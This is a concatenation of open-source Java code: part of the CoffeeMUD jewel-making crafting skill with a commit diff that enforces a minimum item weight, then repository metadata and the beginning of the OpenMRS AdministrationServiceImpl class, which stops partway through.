Armor.LAYERMASK_SEETHROUGH)) &&(A.basePhyStats().armor()<3)) return true; if((A.basePhyStats().armor()<2) &&(I.fitsOn(Wearable.WORN_EARS) ||I.fitsOn(Wearable.WORN_EYES) ||I.fitsOn(Wearable.WORN_HEAD) ||I.fitsOn(Wearable.WORN_NECK) ||I.fitsOn(Wearable.WORN_FEET) ||I.fitsOn(Wearable.WORN_LEFT_FINGER) ||I.fitsOn(Wearable.WORN_RIGHT_FINGER) ||I.fitsOn(Wearable.WORN_LEFT_WRIST) ||I.fitsOn(Wearable.WORN_RIGHT_WRIST))) return true; return (isANativeItem(I.Name())); } return (isANativeItem(I.Name())); } @Override public boolean supportsMending(final Physical I) { return canMend(null, I, true); } @Override protected boolean canMend(final MOB mob, final Environmental E, final boolean quiet) { if(!super.canMend(mob,E,quiet)) return false; if((!(E instanceof Item)) ||(!mayICraft((Item)E))) { if(!quiet) commonTell(mob,L("That's not an jewelworked item.")); return false; } return true; } @Override public String getDecodedComponentsDescription(final MOB mob, final List<String> recipe) { return super.getComponentDescription( mob, recipe, RCP_WOOD ); } @Override public boolean invoke(final MOB mob, final List<String> commands, final Physical givenTarget, final boolean auto, final int asLevel) { return autoGenInvoke(mob,commands,givenTarget,auto,asLevel,0,false,new Vector<Item>(0)); } @Override protected boolean autoGenInvoke(final MOB mob, final List<String> commands, final Physical givenTarget, final boolean auto, final int asLevel, final int autoGenerate, final boolean forceLevels, final List<Item> crafted) { final List<String> originalCommands = new XVector<String>(commands); if(super.checkStop(mob, commands)) return true; if(super.checkInfo(mob, commands)) return true; fireRequired=true; final PairVector<EnhancedExpertise,Integer> enhancedTypes=enhancedTypes(mob,commands); int recipeLevel = 1; randomRecipeFix(mob,addRecipes(mob,loadRecipes()),commands,autoGenerate); if(commands.size()==0) { commonTell(mob,L("Make what? Enter \"jewel list\" for a list. You may also enter jewel encrust <gem name> <item name>, " + "jewel mount <gem name> <item name>, jewel refit <item name>, jewel info <item>, jewel learn <item>, " + "jewel scan, jewel mend <item name>, or jewel stop to cancel.")); return false; } if((!auto) &&(commands.size()>0) &&((commands.get(0)).equalsIgnoreCase("bundle"))) { bundling=true; if(super.invoke(mob,commands,givenTarget,auto,asLevel)) return super.bundle(mob,commands); return false; } final List<List<String>> recipes=addRecipes(mob,loadRecipes()); final String str=commands.get(0); String startStr=null; fireRequired=true; bundling=false; int duration=4; String misctype=""; if(str.equalsIgnoreCase("list")) { String mask=CMParms.combine(commands,1); boolean allFlag=false; if(mask.equalsIgnoreCase("all")) { allFlag=true; mask=""; } int toggler=1; final int toggleTop=2; final StringBuffer buf=new StringBuffer(""); final int[] cols={ CMLib.lister().fixColWidth(27,mob.session()), CMLib.lister().fixColWidth(3,mob.session()), CMLib.lister().fixColWidth(5,mob.session()) }; for(int r=0;r<toggleTop;r++) buf.append((r>0?" ":"")+CMStrings.padRight(L("Item"),cols[0])+" "+CMStrings.padRight(L("Lvl"),cols[1])+" "+CMStrings.padRight(L("Metal"),cols[2])); buf.append("\n\r"); final List<List<String>> listRecipes=((mask.length()==0) || mask.equalsIgnoreCase("all")) ? recipes : super.matchingRecipeNames(recipes, mask, true); for(int r=0;r<listRecipes.size();r++) { final List<String> V=listRecipes.get(r); if(V.size()>0) { final String item=replacePercent(V.get(RCP_FINALNAME),""); final int level=CMath.s_int(V.get(RCP_LEVEL)); final String wood=getComponentDescription(mob,V,RCP_WOOD); if(wood.length()>5) { if(toggler>1) buf.append("\n\r"); toggler=toggleTop; } if((level<=xlevel(mob))||allFlag) { buf.append(CMStrings.padRight(item,cols[0])+" "+CMStrings.padRight(""+level,cols[1])+" "+CMStrings.padRightPreserve(""+wood,cols[2])+((toggler!=toggleTop)?" ":"\n\r")); if(++toggler>toggleTop) toggler=1; } } } commonTell(mob,buf.toString()); enhanceList(mob); return true; } else if(((commands.get(0))).equalsIgnoreCase("learn")) { return doLearnRecipe(mob, commands, givenTarget, auto, asLevel); } else if((str.equalsIgnoreCase("encrust"))||(str.equalsIgnoreCase("mount"))) { final String word=str.toLowerCase(); if(commands.size()<3) { commonTell(mob,L("@x1 what jewel onto what item?",CMStrings.capitalizeAndLower(word))); return false; } final Item fire=getRequiredFire(mob,autoGenerate); buildingI=null; activity = CraftingActivity.CRAFTING; aborted=false; messedUp=false; if(fire==null) return false; final String jewel=commands.get(1); final String rest=CMParms.combine(commands,2); final Environmental jewelE=mob.location().fetchFromMOBRoomFavorsItems(mob,null,jewel,Wearable.FILTER_UNWORNONLY); final Environmental thangE=mob.location().fetchFromMOBRoomFavorsItems(mob,null,rest,Wearable.FILTER_UNWORNONLY); if((jewelE==null)||(!CMLib.flags().canBeSeenBy(jewelE,mob))) { commonTell(mob,L("You don't see any '@x1' here.",jewel)); return false; } if((thangE==null)||(!CMLib.flags().canBeSeenBy(thangE,mob))) { commonTell(mob,L("You don't see any '@x1' here.",rest)); return false; } if((!(jewelE instanceof RawMaterial))||(!(jewelE instanceof Item)) ||(((((Item)jewelE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_PRECIOUS) &&((((Item)jewelE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_GLASS))) { commonTell(mob,L("A @x1 is not suitable to @x2 on anything.",jewelE.name(),word)); return false; } final Item jewelI=(Item)CMLib.materials().unbundle((Item)jewelE,1,null); if(jewelI==null) { commonTell(mob,L("@x1 is not pure enough to be @x2ed with. You will need to use a gathered one.",jewelE.name(),word)); return false; } if((!(thangE instanceof Item)) ||(!thangE.isGeneric()) ||(((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_CLOTH) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_METAL) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_MITHRIL) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_SYNTHETIC) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_ROCK) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_WOODEN) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_LEATHER))) { commonTell(mob,L("A @x1 is not suitable to be @x2ed on.",thangE.name(),word)); return false; } if(!super.invoke(mob,commands,givenTarget,auto,asLevel)) return false; buildingI=(Item)thangE; beingDone=new Pair<Item,String>(null,""); String materialName=RawMaterial.CODES.NAME(jewelI.material()).toLowerCase(); if(word.equals("encrust")) { beingDone.second = (CMStrings.capitalizeAndLower(buildingI.name())+" is encrusted with bits of "+materialName+"."); startStr=L("<S-NAME> start(s) encrusting @x1 with @x2.",buildingI.name(),materialName); displayText=L("You are encrusting @x1 with @x2",buildingI.name(),materialName); verb=L("encrusting @x1 with bits of @x2",buildingI.name(),materialName); } else { materialName=CMLib.english().startWithAorAn(materialName).toLowerCase(); beingDone.second = (CMStrings.capitalizeAndLower(buildingI.name())+" has "+materialName+" mounted on it."); startStr=L("<S-NAME> start(s) mounting @x1 onto @x2.",materialName,buildingI.name()); displayText=L("You are mounting @x1 onto @x2",materialName,buildingI.name()); verb=L("mounting @x1 onto @x2",materialName,buildingI.name()); } beingDone.first = jewelI; messedUp=!proficiencyCheck(mob,0,auto); duration=10; final CMMsg msg=CMClass.getMsg(mob,null,this,getActivityMessageType(),startStr); if(mob.location().okMessage(mob,msg)) { jewelI.destroy(); mob.location().send(mob,msg); beneficialAffect(mob,mob,asLevel,duration); return true; } return false; } if(str.equalsIgnoreCase("scan")) return publicScan(mob,commands); else if(str.equalsIgnoreCase("mend")) { buildingI=null; activity = CraftingActivity.CRAFTING; messedUp=false; final Item fire=getRequiredFire(mob,autoGenerate); if(fire==null) return false; final Vector<String> newCommands=CMParms.parse(CMParms.combine(commands,1)); buildingI=getTargetItemFavorMOB(mob,mob.location(),givenTarget,newCommands,Wearable.FILTER_UNWORNONLY); if(!canMend(mob, buildingI,false)) return false; activity = CraftingActivity.MENDING; if(!super.invoke(mob,commands,givenTarget,auto,asLevel)) return false; startStr=L("<S-NAME> start(s) mending @x1.",buildingI.name()); displayText=L("You are mending @x1",buildingI.name()); verb=L("mending @x1",buildingI.name()); } else if(str.equalsIgnoreCase("refit")) { buildingI=null; activity = CraftingActivity.CRAFTING; messedUp=false; final Item fire=getRequiredFire(mob,autoGenerate); if(fire==null) return false; final Vector<String> newCommands=CMParms.parse(CMParms.combine(commands,1)); buildingI=getTargetItemFavorMOB(mob,mob.location(),givenTarget,newCommands,Wearable.FILTER_UNWORNONLY); if(buildingI==null) return false; if(!mayICraft(mob,buildingI)) return false; if(buildingI.phyStats().height()==0) { commonTell(mob,L("@x1 is already the right size.",buildingI.name(mob))); return false; } activity = CraftingActivity.REFITTING; if(!super.invoke(mob,commands,givenTarget,auto,asLevel)) return false; startStr=L("<S-NAME> start(s) refitting @x1.",buildingI.name()); displayText=L("You are refitting @x1",buildingI.name()); verb=L("refitting @x1",buildingI.name()); } else { beingDone=null; buildingI=null; activity = CraftingActivity.CRAFTING; aborted=false; messedUp=false; String statue=null; if((commands.size()>1)&&(commands.get(commands.size()-1)).startsWith("STATUE=")) { statue=((commands.get(commands.size()-1)).substring(7)).trim(); if(statue.length()==0) statue=null; else commands.remove(commands.size()-1); } int amount=-1; if((commands.size()>1)&&(CMath.isNumber(commands.get(commands.size()-1)))) { amount=CMath.s_int(commands.get(commands.size()-1)); commands.remove(commands.size()-1); } final String recipeName=CMParms.combine(commands,0); List<String> foundRecipe=null; final List<List<String>> matches=matchingRecipeNames(recipes,recipeName,true); for(int r=0;r<matches.size();r++) { final List<String> V=matches.get(r); if(V.size()>0) { final int level=CMath.s_int(V.get(RCP_LEVEL)); if((autoGenerate>0)||(level<=xlevel(mob))) { foundRecipe=V; recipeLevel=level; break; } } } if(foundRecipe==null) { commonTell(mob,L("You don't know how to make a '@x1'. Try \"jewel list\" for a list.",recipeName)); return false; } misctype=foundRecipe.get(RCP_MISCTYPE); bundling=misctype.equalsIgnoreCase("BUNDLE"); if(!bundling) { final Item fire=getRequiredFire(mob,autoGenerate); if(fire==null) return false; } else fireRequired=false; final String woodRequiredStr = foundRecipe.get(RCP_WOOD); final int[] compData = new int[CF_TOTAL]; final String realRecipeName=replacePercent(foundRecipe.get(RCP_FINALNAME),""); final List<Object> componentsFoundList=getAbilityComponents(mob, woodRequiredStr, "make "+CMLib.english().startWithAorAn(realRecipeName),autoGenerate,compData,1); if(componentsFoundList==null) return false; int woodRequired=CMath.s_int(woodRequiredStr); woodRequired=adjustWoodRequired(woodRequired,mob); if(amount>woodRequired) woodRequired=amount; final String otherRequired=foundRecipe.get(RCP_EXTRAREQ); final int[] pm={RawMaterial.MATERIAL_MITHRIL,RawMaterial.MATERIAL_METAL}; final int[][] data=fetchFoundResourceData(mob, woodRequired,"metal",pm, otherRequired.length()>0?1:0,otherRequired,null, false, autoGenerate, enhancedTypes); if(data==null) return false; fixDataForComponents(data,woodRequiredStr,(autoGenerate>0) && (woodRequired==0),componentsFoundList, 1); woodRequired=data[0][FOUND_AMT]; final Session session=mob.session(); if((misctype.equalsIgnoreCase("statue")) &&(session!=null) &&((statue==null)||(statue.trim().length()==0))) { final Ability me=this; final Physical target=givenTarget; if(autoGenerate>0) statue=mob.Name(); else session.prompt(new InputCallback(InputCallback.Type.PROMPT,"",0) { @Override public void showPrompt() { session.promptPrint(L("What is this item a representation of?\n\r: ")); } @Override public void timedOut() { } @Override public void callBack() { final String of=this.input; if((of.trim().length()==0)||(of.indexOf('<')>=0)) return; final Vector<String> newCommands=new XVector<String>(originalCommands); newCommands.add("STATUE="+of); me.invoke(mob, newCommands, target, auto, asLevel); } }); return false; } if(!super.invoke(mob,commands,givenTarget,auto,asLevel)) return false; final MaterialLibrary.DeadResourceRecord deadMats; if((componentsFoundList.size() > 0)||(autoGenerate>0)) deadMats = new MaterialLibrary.DeadResourceRecord(); else deadMats = CMLib.materials().destroyResources(mob.location(),woodRequired,data[0][FOUND_CODE],data[1][FOUND_CODE],null,null); final MaterialLibrary.DeadResourceRecord deadComps = CMLib.ableComponents().destroyAbilityComponents(componentsFoundList); final int lostValue=autoGenerate>0?0:(deadMats.lostValue + deadComps.lostValue); buildingI=CMClass.getItem(foundRecipe.get(RCP_CLASSTYPE)); if(buildingI==null) { commonTell(mob,L("There's no such thing as a @x1!!!",foundRecipe.get(RCP_CLASSTYPE))); return false; } duration=getDuration(CMath.s_int(foundRecipe.get(RCP_TICKS)),mob,CMath.s_int(foundRecipe.get(RCP_LEVEL)),4); String itemName=null; buildingI.setMaterial(getBuildingMaterial(woodRequired,data,compData)); if((otherRequired.length()>0)&&(otherRequired.equalsIgnoreCase("PRECIOUS"))) itemName=replacePercent(foundRecipe.get(RCP_FINALNAME),RawMaterial.CODES.NAME((data[1][FOUND_CODE]))).toLowerCase(); else itemName=determineFinalName(foundRecipe.get(RCP_FINALNAME),buildingI.material(),deadMats,deadComps); if(bundling) itemName="a "+woodRequired+"# "+itemName; else if(!CMLib.english().startsWithAnArticle(itemName)) itemName=CMLib.english().startWithAorAn(itemName); buildingI.setName(itemName); startStr=L("<S-NAME> start(s) making @x1.",buildingI.name()); displayText=L("You are making @x1",buildingI.name()); verb=L("making @x1",buildingI.name()); playSound="tinktinktink.wav"; buildingI.setDisplayText(L("@x1 lies here",itemName)); if((data[1][FOUND_CODE]>0) &&(((data[0][FOUND_CODE]&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_METAL) ||((data[0][FOUND_CODE]&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_MITHRIL)) &&(((data[1][FOUND_CODE]&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_PRECIOUS))) buildingI.setDescription(L("@x1 made of @x2.",itemName,RawMaterial.CODES.NAME(data[0][FOUND_CODE]).toLowerCase())); else buildingI.setDescription(itemName+". "); buildingI.basePhyStats().setWeight(getStandardWeight(woodRequired+compData[CF_AMOUNT],bundling)); buildingI.setBaseValue(CMath.s_int(foundRecipe.get(RCP_VALUE))+(woodRequired*(RawMaterial.CODES.VALUE(data[0][FOUND_CODE])))); setBrand(mob, buildingI); if((buildingI.material()!=data[1][FOUND_CODE]) &&((data[1][FOUND_CODE]&RawMaterial.MATERIAL_MASK)>0)) buildingI.setBaseValue(buildingI.baseGoldValue()+RawMaterial.CODES.VALUE(data[1][FOUND_CODE])); buildingI.basePhyStats().setLevel(CMath.s_int(foundRecipe.get(RCP_LEVEL))); //int capacity=CMath.s_int((String)foundRecipe.get(RCP_CAPACITY)); final int armordmg=CMath.s_int(foundRecipe.get(RCP_ARMORDMG)); final String spell=(foundRecipe.size()>RCP_SPELL)?foundRecipe.get(RCP_SPELL).trim():""; addSpells(buildingI,spell,deadMats.lostProps,deadComps.lostProps); if((buildingI instanceof Armor)&&(!(buildingI instanceof FalseLimb))) { ((Armor)buildingI).basePhyStats().setArmor(0); if(armordmg!=0) ((Armor)buildingI).basePhyStats().setArmor(armordmg); setWearLocation(buildingI,misctype,0); } if(buildingI.ID().endsWith("Dice")) { buildingI.basePhyStats().setAbility(armordmg); } if((misctype.equalsIgnoreCase("statue")) &&(statue!=null) &&(statue.trim().length()>0)) { buildingI.setName(L("@x1 of @x2",itemName,statue.trim())); buildingI.setDisplayText(L("@x1 of @x2 is here",itemName,statue.trim())); buildingI.setDescription(L("@x1 of @x2. ",itemName,statue.trim())); } if(bundling) buildingI.setBaseValue(lostValue); buildingI.recoverPhyStats(); buildingI.text(); buildingI.recoverPhyStats(); } messedUp=!proficiencyCheck(mob,0,auto); if(bundling) { messedUp=false; duration=1; verb=L("bundling @x1",RawMaterial.CODES.NAME(buildingI.material()).toLowerCase()); startStr=L("<S-NAME> start(s) @x1.",verb); displayText=L("You are @x1",verb); } if(autoGenerate>0) { crafted.add(buildingI); return true; } final CMMsg msg=CMClass.getMsg(mob,buildingI,getActivityMessageType(),startStr); if(mob.location().okMessage(mob,msg)) { mob.location().send(mob,msg); buildingI=(Item)msg.target(); beneficialAffect(mob,mob,asLevel,duration); enhanceItem(mob,buildingI,recipeLevel,enhancedTypes); return true; } else if(bundling) { messedUp=false; aborted=false; unInvoke(); } return false; } }
jewelmaking tweek for 0 weight items. git-svn-id: 0cdf8356e41b2d8ccbb41bb76c82068fe80b2514@17337 0d6f1817-ed0e-0410-87c9-987e46238f29
com/planet_ink/coffee_mud/Abilities/Common/JewelMaking.java
jewelmaking tweek for 0 weight items.
<ide><path>om/planet_ink/coffee_mud/Abilities/Common/JewelMaking.java <ide> else <ide> buildingI.setDescription(itemName+". "); <ide> buildingI.basePhyStats().setWeight(getStandardWeight(woodRequired+compData[CF_AMOUNT],bundling)); <del> buildingI.setBaseValue(CMath.s_int(foundRecipe.get(RCP_VALUE))+(woodRequired*(RawMaterial.CODES.VALUE(data[0][FOUND_CODE])))); <add> if(buildingI.basePhyStats().weight()<=0) <add> buildingI.basePhyStats().setWeight(1); <add> final int valueAdjust = (woodRequired*(RawMaterial.CODES.VALUE(data[0][FOUND_CODE]))); <add> buildingI.setBaseValue(CMath.s_int(foundRecipe.get(RCP_VALUE))+valueAdjust); <ide> setBrand(mob, buildingI); <ide> if((buildingI.material()!=data[1][FOUND_CODE]) <ide> &&((data[1][FOUND_CODE]&RawMaterial.MATERIAL_MASK)>0))
Java
mpl-2.0
2cead7a7949d3ab4f95768ec7590e348f3cccab8
0
asifur77/openmrs,lbl52001/openmrs-core,ssmusoke/openmrs-core,sravanthi17/openmrs-core,jembi/openmrs-core,spereverziev/openmrs-core,alexwind26/openmrs-core,iLoop2/openmrs-core,aboutdata/openmrs-core,kckc/openmrs-core,andyvand/OpenMRS,milankarunarathne/openmrs-core,jembi/openmrs-core,jembi/openmrs-core,Ch3ck/openmrs-core,donaldgavis/openmrs-core,AbhijitParate/openmrs-core,donaldgavis/openmrs-core,sravanthi17/openmrs-core,geoff-wasilwa/openmrs-core,geoff-wasilwa/openmrs-core,asifur77/openmrs,Winbobob/openmrs-core,preethi29/openmrs-core,WANeves/openmrs-core,geoff-wasilwa/openmrs-core,AbhijitParate/openmrs-core,kckc/openmrs-core,dcmul/openmrs-core,spereverziev/openmrs-core,spereverziev/openmrs-core,Ch3ck/openmrs-core,ern2/openmrs-core,aboutdata/openmrs-core,jembi/openmrs-core,sravanthi17/openmrs-core,maany/openmrs-core,vinayvenu/openmrs-core,kabariyamilind/openMRSDEV,nilusi/Legacy-UI,shiangree/openmrs-core,lbl52001/openmrs-core,hoquangtruong/TestMylyn,aboutdata/openmrs-core,jamesfeshner/openmrs-module,maany/openmrs-core,michaelhofer/openmrs-core,pselle/openmrs-core,trsorsimoII/openmrs-core,foolchan2556/openmrs-core,macorrales/openmrs-core,jvena1/openmrs-core,sadhanvejella/openmrs,MuhammadSafwan/Stop-Button-Ability,iLoop2/openmrs-core,Openmrs-joel/openmrs-core,aj-jaswanth/openmrs-core,pselle/openmrs-core,sintjuri/openmrs-core,jvena1/openmrs-core,aj-jaswanth/openmrs-core,maekstr/openmrs-core,lilo2k/openmrs-core,dcmul/openmrs-core,ssmusoke/openmrs-core,jcantu1988/openmrs-core,kigsmtua/openmrs-core,koskedk/openmrs-core,naraink/openmrs-core,prisamuel/openmrs-core,alexei-grigoriev/openmrs-core,kristopherschmidt/openmrs-core,andyvand/OpenMRS,sintjuri/openmrs-core,spereverziev/openmrs-core,jamesfeshner/openmrs-module,ldf92/openmrs-core,macorrales/openmrs-core,siddharthkhabia/openmrs-core,donaldgavis/openmrs-core,preethi29/openmrs-core,ssmusoke/openmrs-core,sadhanvejella/openmrs,Winbobob/openmrs-core,Ch3ck/openmrs-core,nilusi/Legacy-UI,vinayvenu/openmrs-core,AbhijitParate/openmrs-core,rbtracker/openmrs-core,macorrales/openmrs-core,Winbobob/openmrs-core,joansmith/openmrs-core,pselle/openmrs-core,ldf92/openmrs-core,MuhammadSafwan/Stop-Button-Ability,kckc/openmrs-core,kristopherschmidt/openmrs-core,AbhijitParate/openmrs-core,geoff-wasilwa/openmrs-core,trsorsimoII/openmrs-core,ern2/openmrs-core,maekstr/openmrs-core,naraink/openmrs-core,shiangree/openmrs-core,dlahn/openmrs-core,kabariyamilind/openMRSDEV,aj-jaswanth/openmrs-core,michaelhofer/openmrs-core,Negatu/openmrs-core,vinayvenu/openmrs-core,andyvand/OpenMRS,alexei-grigoriev/openmrs-core,lbl52001/openmrs-core,lbl52001/openmrs-core,ldf92/openmrs-core,Openmrs-joel/openmrs-core,shiangree/openmrs-core,andyvand/OpenMRS,kigsmtua/openmrs-core,asifur77/openmrs,pselle/openmrs-core,donaldgavis/openmrs-core,sintjuri/openmrs-core,koskedk/openmrs-core,nilusi/Legacy-UI,ern2/openmrs-core,Negatu/openmrs-core,ern2/openmrs-core,alexwind26/openmrs-core,siddharthkhabia/openmrs-core,WANeves/openmrs-core,kabariyamilind/openMRSDEV,foolchan2556/openmrs-core,siddharthkhabia/openmrs-core,iLoop2/openmrs-core,WANeves/openmrs-core,koskedk/openmrs-core,sintjuri/openmrs-core,geoff-wasilwa/openmrs-core,dlahn/openmrs-core,siddharthkhabia/openmrs-core,MitchellBot/openmrs-core,MuhammadSafwan/Stop-Button-Ability,chethandeshpande/openmrs-core,sravanthi17/openmrs-core,iLoop2/openmrs-core,alexwind26/openmrs-core,sintjuri/openmrs-core,Openmrs-joel/openmrs-core,shiangree/openmrs-core,ssmusoke/openmrs-core,prisamuel/openmrs-core,shiangree/openmrs-core,WANeves/openmrs-core,MitchellBot/openmrs-core,prisamuel/openmrs-core,WANeves/openmrs-core,siddharthkhabia/openmrs-core,spereverziev/openmrs-core,chethandeshpande/openmrs-core,jvena1/openmrs-core,alexwind26/openmrs-core,alexei-grigoriev/openmrs-core,asifur77/openmrs,trsorsimoII/openmrs-core,foolchan2556/openmrs-core,kckc/openmrs-core,kigsmtua/openmrs-core,andyvand/OpenMRS,Ch3ck/openmrs-core,maekstr/openmrs-core,sadhanvejella/openmrs,maany/openmrs-core,aboutdata/openmrs-core,pselle/openmrs-core,alexei-grigoriev/openmrs-core,dlahn/openmrs-core,aboutdata/openmrs-core,MuhammadSafwan/Stop-Button-Ability,vinayvenu/openmrs-core,hoquangtruong/TestMylyn,asifur77/openmrs,nilusi/Legacy-UI,hoquangtruong/TestMylyn,iLoop2/openmrs-core,prisamuel/openmrs-core,milankarunarathne/openmrs-core,kigsmtua/openmrs-core,maekstr/openmrs-core,chethandeshpande/openmrs-core,kigsmtua/openmrs-core,jvena1/openmrs-core,naraink/openmrs-core,milankarunarathne/openmrs-core,MuhammadSafwan/Stop-Button-Ability,dlahn/openmrs-core,jcantu1988/openmrs-core,nilusi/Legacy-UI,andyvand/OpenMRS,sadhanvejella/openmrs,preethi29/openmrs-core,jcantu1988/openmrs-core,foolchan2556/openmrs-core,milankarunarathne/openmrs-core,donaldgavis/openmrs-core,trsorsimoII/openmrs-core,maany/openmrs-core,dcmul/openmrs-core,vinayvenu/openmrs-core,sadhanvejella/openmrs,Negatu/openmrs-core,aj-jaswanth/openmrs-core,MitchellBot/openmrs-core,kristopherschmidt/openmrs-core,jembi/openmrs-core,WANeves/openmrs-core,jcantu1988/openmrs-core,prisamuel/openmrs-core,iLoop2/openmrs-core,AbhijitParate/openmrs-core,kckc/openmrs-core,koskedk/openmrs-core,jcantu1988/openmrs-core,lilo2k/openmrs-core,rbtracker/openmrs-core,lilo2k/openmrs-core,hoquangtruong/TestMylyn,MitchellBot/openmrs-core,maekstr/openmrs-core,milankarunarathne/openmrs-core,aj-jaswanth/openmrs-core,rbtracker/openmrs-core,alexwind26/openmrs-core,rbtracker/openmrs-core,Winbobob/openmrs-core,joansmith/openmrs-core,Winbobob/openmrs-core,lbl52001/openmrs-core,naraink/openmrs-core,chethandeshpande/openmrs-core,shiangree/openmrs-core,Negatu/openmrs-core,lilo2k/openmrs-core,naraink/openmrs-core,jvena1/openmrs-core,macorrales/openmrs-core,joansmith/openmrs-core,kabariyamilind/openMRSDEV,AbhijitParate/openmrs-core,dcmul/openmrs-core,michaelhofer/openmrs-core,hoquangtruong/TestMylyn,jamesfeshner/openmrs-module,spereverziev/openmrs-core,siddharthkhabia/openmrs-core,sadhanvejella/openmrs,alexei-grigoriev/openmrs-core,Ch3ck/openmrs-core,ern2/openmrs-core,pselle/openmrs-core,aboutdata/openmrs-core,trsorsimoII/openmrs-core,Negatu/openmrs-core,ssmusoke/openmrs-core,jamesfeshner/openmrs-module,macorrales/openmrs-core,preethi29/openmrs-core,kabariyamilind/openMRSDEV,joansmith/openmrs-core,MitchellBot/openmrs-core,lbl52001/openmrs-core,dcmul/openmrs-core,prisamuel/openmrs-core,milankarunarathne/openmrs-core,chethandeshpande/openmrs-core,alexei-grigoriev/openmrs-core,lilo2k/openmrs-core,maany/openmrs-core,hoquangtruong/TestMylyn,sravanthi17/openmrs-core,kigsmtua/openmrs-core,nilusi/Legacy-UI,preethi29/openmrs-core,koskedk/openmrs-core,naraink/openmrs-core,koskedk/openmrs-core,joansmith/openmrs-core,ldf92/openmrs-core,sintjuri/openmrs-core,Winbobob/openmrs-core,rbtracker/openmrs-core,Openmrs-joel/openmrs-core,jembi/openmrs-core,michaelhofer/openmrs-core,Openmrs-joel/openmrs-core,Negatu/openmrs-core,michaelhofer/openmrs-core,kckc/openmrs-core,jamesfeshner/openmrs-module,ldf92/openmrs-core,dlahn/openmrs-core,lilo2k/openmrs-core,dcmul/openmrs-core,MuhammadSafwan/Stop-Button-Ability,maekstr/openmrs-core,foolchan2556/openmrs-core,kristopherschmidt/openmrs-core,kristopherschmidt/openmrs-core,foolchan2556/openmrs-core
/** * The contents of this file are subject to the OpenMRS Public License * Version 1.0 (the "License"); you may not use this file except in * compliance with the License. You may obtain a copy of the License at * http://license.openmrs.org * * Software distributed under the License is distributed on an "AS IS" * basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the * License for the specific language governing rights and limitations * under the License. * * Copyright (C) OpenMRS, LLC. All Rights Reserved. */ package org.openmrs.api.impl; import java.io.StringWriter; import java.io.UnsupportedEncodingException; import java.net.InetAddress; import java.net.UnknownHostException; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Calendar; import java.util.Collection; import java.util.HashMap; import java.util.HashSet; import java.util.LinkedHashMap; import java.util.LinkedHashSet; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.Properties; import java.util.Set; import java.util.SortedMap; import java.util.TreeMap; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.openmrs.Concept; import org.openmrs.ConceptClass; import org.openmrs.ConceptDatatype; import org.openmrs.ConceptProposal; import org.openmrs.ConceptSource; import org.openmrs.EncounterType; import org.openmrs.FieldType; import org.openmrs.GlobalProperty; import org.openmrs.ImplementationId; import org.openmrs.Location; import org.openmrs.MimeType; import org.openmrs.OpenmrsObject; import org.openmrs.PatientIdentifierType; import org.openmrs.Privilege; import org.openmrs.Role; import org.openmrs.Tribe; import org.openmrs.User; import org.openmrs.api.APIAuthenticationException; import org.openmrs.api.APIException; import org.openmrs.api.AdministrationService; import org.openmrs.api.EventListeners; import org.openmrs.api.GlobalPropertyListener; import org.openmrs.api.context.Context; import org.openmrs.api.db.AdministrationDAO; import org.openmrs.customdatatype.CustomDatatypeUtil; import org.openmrs.module.Module; import org.openmrs.module.ModuleFactory; import org.openmrs.module.ModuleUtil; import org.openmrs.reporting.AbstractReportObject; import org.openmrs.reporting.Report; import org.openmrs.util.HttpClient; import org.openmrs.util.LocaleUtility; import org.openmrs.util.OpenmrsConstants; import org.openmrs.util.OpenmrsUtil; import org.openmrs.util.PrivilegeConstants; import org.springframework.transaction.annotation.Transactional; import org.springframework.util.StringUtils; import org.springframework.validation.Errors; /** * Default implementation of the administration services. This class should not be used on its own. * The current OpenMRS implementation should be fetched from the Context * * @see org.openmrs.api.AdministrationService * @see org.openmrs.api.context.Context */ @Transactional public class AdministrationServiceImpl extends BaseOpenmrsService implements AdministrationService, GlobalPropertyListener { protected Log log = LogFactory.getLog(getClass()); protected AdministrationDAO dao; private EventListeners eventListeners; /** * An always up-to-date collection of the allowed locales. */ private GlobalLocaleList globalLocaleList; private HttpClient implementationIdHttpClient; /** * Default empty constructor */ public AdministrationServiceImpl() { } /** * @see org.openmrs.api.AdministrationService#setAdministrationDAO(org.openmrs.api.db.AdministrationDAO) */ public void setAdministrationDAO(AdministrationDAO dao) { this.dao = dao; } public void setEventListeners(EventListeners eventListeners) { this.eventListeners = eventListeners; } /** * @see org.openmrs.api.AdministrationService#createEncounterType(org.openmrs.EncounterType) * @deprecated */ @Deprecated public void createEncounterType(EncounterType encounterType) throws APIException { Context.getEncounterService().saveEncounterType(encounterType); } /** * @see org.openmrs.api.AdministrationService#updateEncounterType(org.openmrs.EncounterType) * @deprecated */ @Deprecated public void updateEncounterType(EncounterType encounterType) throws APIException { Context.getEncounterService().saveEncounterType(encounterType); } /** * @see org.openmrs.api.AdministrationService#deleteEncounterType(org.openmrs.EncounterType) * @deprecated */ @Deprecated public void deleteEncounterType(EncounterType encounterType) throws APIException { Context.getEncounterService().purgeEncounterType(encounterType); } /** * @see org.openmrs.api.PatientService#savePatientIdentifierType(PatientIdentifierType) * @deprecated replaced by * {@link org.openmrs.api.PatientService#savePatientIdentifierType(PatientIdentifierType)} */ @Deprecated public void createPatientIdentifierType(PatientIdentifierType patientIdentifierType) throws APIException { Context.getPatientService().savePatientIdentifierType(patientIdentifierType); } /** * @see org.openmrs.api.PatientService#savePatientIdentifierType(PatientIdentifierType) * @deprecated replaced by * {@link org.openmrs.api.PatientService#savePatientIdentifierType(PatientIdentifierType)} */ @Deprecated public void 